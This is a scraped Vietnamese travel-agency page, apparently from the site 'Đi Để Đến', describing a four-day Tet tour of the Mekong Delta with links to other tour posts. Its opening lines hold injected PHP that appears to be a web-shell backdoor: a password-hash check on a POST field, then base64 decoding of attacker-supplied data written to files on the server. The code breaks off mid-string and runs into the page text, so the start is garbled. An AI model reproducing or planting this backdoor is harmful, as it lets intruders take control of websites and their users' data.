function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour khám phá miền Tây sông nước dịp Tết Nguyên Đán - Đi Để Đến

Tour khám phá miền Tây sông nước dịp Tết Nguyên Đán

14/12/2017 Đi Để Đến - Group

Ngày 1: TPHCM – Tiền Giang – Kiên Giang

Sáng: Qúy khách tập trung tại điểm hẹn. Xe và hướng dẫn viên công ty du lịch đón đoàn, khởi hành đi Tiền Giang. Tới TP Mỹ Tho, đoàn dừng chân dùng điểm tâm sáng. Sau đó quý khách lên xe đi dạo một vòng thành phố, ngang qua những công trình kiến trúc cũng như di tích quan trọng của Mỹ Tho.

Đoàn lên tàu du ngoạn dòng sông Tiền, ngắm nhìn khung cảnh tươi mát của vườn cây ăn trái trên các cù lao Long, Lân, Quy, Phụng.

tour du lịch miền tây

Đi xuồng ngắm cảnh sông nước ở cù lao Thới Sơn – Ảnh: Internet

Tàu ghé cồn Lân (cù lao Thới Sơn) tham quan cơ sở nuôi ong lấy mật, nơi sản xuất, chế biến kẹo dừa. Bên cạnh đó, quý khách còn có dịp thưởng thức các loại trái cây thơm ngon (theo mùa), uống trà tắc pha mật ong nguyên chất tại nhà vườn, giao lưu đờn ca tài tử Nam Bộ, đặc biệt là đi xuồng qua những con rạch nhỏ với hai bên là hàng dừa mát rượi.

Qúy khách tiếp tục lên tàu đi qua cồn Phụng ghé thăm di tích ông Đạo Dừa. Sau khi dùng bữa trưa tại đây, quý khách lên xe ngựa dạo quanh những con đường quê xanh mát, thưởng ngoạn phong cảnh Bến Tre.

Chiều: Đoàn lên xe khởi hành đi Rạch Giá, đến đây quý khách nhận phòng nghỉ ngơi. Sau bữa cơm chiều, xe đưa đoàn đi dạo một vòng phố thị, ngang qua khu đô thị lấn biển thoáng đãng, sạch đẹp, luôn nhộn nhịp về đêm.

Qúy khách nghỉ đêm tại đây.

Ngày 2: Rạch Giá – Cà Mau – Đất Mũi

Sáng: Qúy khách dùng điểm tâm, trả phòng khách sạn. Đoàn khởi hành đi Cà Mau. Đến thành phố Cà Mau, quý khách dừng chân dùng bữa trưa, nghỉ ngơi. Sau đó, tiếp tục lên xe đi Năm Căn, đến đây chinh phục những cây số cuối cùng của con đường thiên lý Việt Nam.

đặt tour du lịch miền tây dịp tết

Mũi Cà Mau, cực nam của Tổ quốc – Ảnh: Internet

Đoàn lên cano đi qua sông Cửa Lớn, Ông Trang, Rạch Tàu đến Mũi Cà Mau – vùng đất cực nam của Tổ quốc. Tại đây, quý khách chiêm ngưỡng phong cảnh kỳ vỹ, nên thơ và tận mắt thấy khu rừng ngập mặn lớn thứ 2 thế giới.

Đoàn chụp hình lưu niệm tại cột mốc tọa độ quốc gia và pano biểu tượng của mũi Cà Mau.

Chiều: Qúy khách rời Đất Mũi về lại TP Cà Mau nhận phòng nghỉ ngơi. Nghỉ đêm tại Cà Mau.

Ngày 3: Cà Mau – Bạc Liêu – Sóc Trăng – Cần Thơ

Sáng: Qúy khách dùng điểm tâm, thu dọn hành lý và làm thủ tục trả phòng. Sau đó, xe đưa đoàn khởi hành đi Bạc Liêu. Đến nơi, đoàn tham quan nhà công tử Bạc Liêu – nơi lưu dấu cuộc sống giàu có, xa hoa của các đại điền chủ xưa và nhất là gắn liền với cuộc đời của công tử Bạc Liêu.

đặt tour du lịch miền tây dịp tết giá rẻ nhất

Nhà công tử Bạc Liêu lưu giữ rất nhiều nội thất cổ, quý hiếm – Ảnh sưu tầm

Tiếp tục chuyến du lịch Bạc Liêu, quý khách sẽ đến viếng Phật Bà Nam Hải – một trong những điểm tâm linh nổi tiếng ở miền Tây.

Chiều: Qúy khách ghé thăm chùa Dơi, chùa Đất Sét – hai trong số những ngôi chùa cổ kính, độc đáo ở Sóc Trăng. Chùa Dơi và chùa Đất Sét được xây dựng theo lối kiến trúc đặc trưng của Khơ-me với phong cảnh lạ mắt cùng nhiều câu chuyện ly kỳ hấp dẫn.

mua tour du lịch miền tây dịp tết nguyên đán 2018

Kiến trúc độc đáo của chùa Dơi – Ảnh sưu tầm

Đoàn tiếp tục di chuyển đến thị xã Ngã Bảy (tỉnh Hậu Giang) – nơi ra đời của bài vọng cổ Tình Anh Bán Chiếu rất nổi tiếng. Sau đó, quý khách lên xe xuôi về Cần Thơ. Đến đây nhận phòng khách sạn nghỉ ngơi.

Tối: Xe đưa quý khách ra bến Ninh Kiều, lên thuyền du ngoạn sông Hậu, nghe những giai điệu đờn ca tài tử ngọt ngào. Nghỉ đêm tại Cần Thơ.

Ngày 4: Cần Thơ – Chợ nổi Cái Răng – Làng du lịch Mỹ Khánh

Sáng: Qúy khách trả phòng, xuống đò tham quan chợ nổi Cái Răng – một trong những chợ nổi lớn nhất đồng bằng sông Cửu Long. Qúy khách có thể nhìn món hàng treo trên cây chèo bẻo ở đầu ghe để biết ghe đó bán gì. Tại đây, bạn có thể ăn sáng và mua các thực phẩm khô, trái cây mang về làm quà cho người thân.

Địa điểm tiếp theo trong tour du lịch Cần Thơ là làng du lịch Mỹ Khánh. Đến đây, quý khách có thể dạo chơi trong không gian xanh mát của những khu vườn xoài, mận, ổi, chôm chôm, mít, sầu riêng,… Bên cạnh đó, bạn còn được trải nghiệm làm bánh tráng, nấu rượu đến, thưởng thức các món ăn dân dã như cá lóc nướng ống tre, chuột quay lu, lẩu đồng quê.

mua tour du lịch miền tây dịp tết 4N3Đ

Chợ nổi Cái Răng được xem là nét văn hóa đặc trưng của miền Tây sông nước – Ảnh: Internet

Sau đó, đoàn lên xe di chuyển đến thiền viện Trúc Lâm Phương Nam – ngôi thiền viện lớn và đẹp nhất miền Tây Nam Bộ.

Chiều: Xe đưa đoàn qua cầu Cần Thơ, cầu Bắc Mỹ Thuận về lại TPHCM.

Đến điểm đón ban đầu, hướng dẫn viên chia tay, chào tạm biệt và hẹn gặp lại quý khách trong hành trình khác. Kết thúc tour du lịch trong nước 4N3Đ dịp Tết Nguyên Đán hấp dẫn.

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]